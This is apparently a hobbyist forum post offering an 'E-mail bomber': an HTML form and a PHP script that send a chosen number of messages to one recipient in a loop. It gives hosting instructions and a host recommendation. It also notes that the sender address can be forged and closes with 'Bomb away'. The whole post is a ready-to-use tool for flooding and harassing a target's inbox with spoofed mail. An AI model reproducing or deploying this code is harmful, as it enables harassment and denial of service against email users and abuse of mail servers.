Ok heres a basic E-mail bomber using a PHP script and a HTML page. Just host both files in the same directory and then go to the Mailer.html page fill in the boxes and how many you want it to send in the Bombing input. This is a basic loop fuction in PHP.
Mailer.HTML
'
<html>
<body>
<Form action="Mailer.php" method="POST">
To: <input type="text" name="to"><br>
From: <input type="text" name="from"><br>
Subject: <input type="text" name="subject"><br>
Message: <input type="text" name="body"><br>
Bomb: <input type="text" name="x"><br>
<input type="submit" value=" Bomb! ">
</form>
</body>
</html>
Mailer.php
'
<?php
$to;
$subject;
$body;
$from;
$x;
$i=1;
$headers = "From: $from" ;
if ($x>0) {
while($i<$x)
{
echo"<p>Bombing sent $i/$x </p>";
mail($to, $subject, $body, $headers);
$i++;
}
echo"<p>Bombing sent $i/$x </p>";
echo"<p>$to just got BOMBED!</p>";
}
?>
'
*note you can use what ever you want for the from Address so "yourmother@myhouse.com" doesnt have to be a real e-mail address.
Also how much it can send at one time is based on your hosting sites speed. I use hostultra.com for my hosting site its not free but its only a year and it allows PHP without restrictions. I can send 100 at once anymore and it wont work.
There ya go Bomb away ;)
~[AV0]Tehdead~